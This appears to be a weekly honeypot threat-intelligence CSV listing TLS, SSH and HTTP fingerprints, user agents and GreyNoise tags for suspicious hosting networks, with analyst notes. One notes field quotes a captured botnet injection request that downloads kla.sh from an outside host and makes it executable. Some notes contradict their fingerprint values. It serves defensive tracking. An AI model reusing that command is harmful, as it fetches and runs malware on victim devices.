aboutsummaryrefslogtreecommitdiff
path: root/kevlar/2026-07-20/honeylabs/fingerprints.csv
blob: cb6373618e0f215e18ffc2d3ce04302d160f6db6 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
asn,asn_org,source_ip,fingerprint_type,fingerprint,ssh_banner_ua,tls_version,notes
AS57043,Hostkey B.v.,132.243.194.215,ja4h,ge11nn0400_777e992b8532,,,"IoT MIPS downloader GET /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh;chmod+777+./kla.sh -- NEW this week vs HASSH libssh_0.9.6 last week (different IP)"
AS57043,Hostkey B.v.,132.243.194.215,ua,Mozilla/5.0,,,"Generic Mozilla UA on botnet callback port 6001"
AS51396,Pfcloud UG,various,ua,Go-http-client/1.1,,,"3 IPs - dominant in 8080/3128/3000/9090/8443 scanning"
AS51396,Pfcloud UG,various,ua,Mozilla/5.0 zgrab/0.x,,,"3 IPs - 8081/3001/3000 scanning"
AS51396,Pfcloud UG,various,ua,odin-scanner/0.4,,,"NEW THIS WEEK -- 38 events, scans 20128/11235 'Hello World' on port 80"
AS51396,Pfcloud UG,various,ua,Hello World,,,"12 events, port 80 <-- distinctive minimalistic UA suggesting custom tooling"
AS51396,Pfcloud UG,204.76.203.18,hassh-server,425d29fe50d8e4f5e37efb6e24bcf660,SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u7,,Censys-enriched server-side HASSH; this is the lead of the 204.76.203.x cluster (13K+ sponge sessions)
AS51396,Pfcloud UG,204.76.203.18,ja4tscan,65160_2-1-1-4-1-3_1460_10_1-2,,,"Distinctive TCP fingerprint MTU 42340 -- not the default Ubuntu 65160 -- appears custom-tuned (smaller MSS)"
AS51852,Private Layer INC,81.17.28.130,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.15,,NEW primary Honeylabs IP this week (vs 179.43.134.114 prior; prior week same OpenSSL but 0.10 suffix - upgrade)
AS51852,Private Layer INC,81.17.28.130,ua,Chrome/144.0.0.0 Safari/537.36,,,"HTTP HEAD / scanning via Windows Chrome 144 -- 252 events over 5 days"
AS51852,Private Layer INC,179.43.186.240,ua,Go-http-client/1.1,,,"6 events HTTP scanning port 443"
AS30823,aurologic GmbH,41.216.188.21,ja4,t13i190800_9dc949149365_97f8aa674fd9,,TLSv1.3,JA4 base 9dc949149365 -- SAME JA4 as FLOKINET Tor exit (AS200651); the 190800 i-form means TLS 1.3 + i08 (single cipher only)
AS30823,aurologic GmbH,41.216.188.21,ja3,19e29534fd49dd27d09234e639c4057e,,TLSv1.3,Distinct JA3 baseline
AS30823,aurologic GmbH,41.216.188.21,ja4h,ge11nn0500_9af7e0472034,,HTTP,Android Chrome 76 mobile UA (decoy or legitimate mobile)
AS200651,FlokiNET ehf,185.100.87.136,hassh-client,e54ef3ec27fe1fea7ab64d3fa05359fd,SSH-2.0-OpenSSH_10.2p1,,UPGRADED from OpenSSH_10.1 last week (subtle 0.1 bump) -- same client HASSH (OpenSSH_10.x series shares HASSH)
AS200651,FlokiNET ehf,185.100.87.136,hassh-server,b1bff636ebbdbaa9dd2ad97fd173c956,SSH-2.0-OpenSSH_9.9,,Server-side OpenSSH_9.9 on port 7288 (alt SSH port -- furtive)
AS200651,FlokiNET ehf,185.100.87.136,ja4,t13i1909h2_9dc949149365_97f8aa674fd9,,TLSv1.3,Same JA4 as 2026-07-13 (stable)
AS200651,FlokiNET ehf,185.100.87.136,ja3,7c1e207beb00684bbbe144f1b0abe1d5,,TLSv1.3,Same JA3 as 2026-07-13 (stable)
AS200651,FlokiNET ehf,185.100.87.136,ja4h,ge11nn0400_88d30a62b7ad,,HTTP,Same JA4H as 2026-07-13 (stable)
AS200651,FlokiNET ehf,185.100.87.136,ja4h,po11nn0600_c9506d37ac14,,HTTP,NEW this week -- associated with SPARK COMMIT: 08059e95... UA + content-type: application/octet-stream body (CVE-style implant reporting)
AS200651,FlokiNET ehf,185.100.87.136,jarm,2ad2ad16d2ad2ad00042d42d000000332dc9cd7d90589195193c8bb05d84fa,,Tor exit TLS 1.3 256gcm + cipher suite resolution
AS198953,Proton66 OOO,176.120.22.16,greynoise,suspicious,,,"GreyNoise classifies suspicious -- tags: MySQL Protocol, TLS Crawler, Python requests client, Generic Suspicious Linux Command"
AS214940,Kprohost LLC,77.83.39.119,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16,,"SHARED HASSH across all Ubuntu OpenSSH 8.9p1 in this block -- fleet uniformity"
AS214940,Kprohost LLC,77.83.39.119,greynoise,malicious,,,"Classified malicious by GreyNoise -- tags: Web Crawler, TLS Crawler, ENV Crawler (.env!), GoogleBot pretender, Java HTTP client"
AS210644,Aeza Group LLC,various,no-honeylabs-data,,,"0 honeypot events this week -- prior week single event from 46.226.162.205 has vanished"
AS209847,(real AS41745 FORTIS),45.144.28.70,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16,+ SSH,STILL shared Ubuntu 8.9p1 HASSH with AS214940; network creation 2026-06-06 (very new BGP) -- GreyNoise malicious: HTTP OPTIONS crawler, Go HTTP client, Generic Brute Force, TLS Crawler
AS209847,(real AS41745 FORTIS),45.144.28.70,ja4tscan,65160_2-4-8-1-3_1460_7_1-2,,Ubuntu default MTU 65160 (no anti-fingerprint tuning)
AS211720,Datashield Inc.,185.231.33.46,jarm,07d19d12d21d21d07c42d43d000000f50d155305214cf247147c43c0f1a823,,Server-side JARM -- distinctive fingerprint; TLS 1.0/1.1 still enabled (DOWNGRADE possible misconfig)
AS211720,Datashield Inc.,185.231.33.46,cert-cn,prohaska.beatty.biz,,,"Self-signed cert -- CN=prohaska.beatty.biz, O=Prohaska-Beatty, OU=compress, ST=HI, C=US, emailAddress=compress@prohaska.beatty.biz"
AS14956,RouterHosting LLC,216.126.239.17,hassh-server,e42184b06d45385a906f0803d04c83da,SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.18,,OpenSSH 9.6 (more current than peers; security-conscious maintenance)
AS14956,RouterHosting LLC,216.126.239.17,ua,PMTA-Auto,,,"PowerMTA mail bruteforce scanner UA; 55 events over 4 days on ports 9900/2698/12124/2156/4071 - proxy brute"
AS14956,RouterHosting LLC,216.126.239.17,wkzeug-fofa,"Werkzeug/3.1.8 Python/3.12.3 / WWW-Authenticate: Basic realm=fofa_monitor",,Distinctive misconfiguration: HTTP 401 with fofa_monitor Basic realm -- Censys flagged as Unencrypted HTTP Weak Auth (high severity)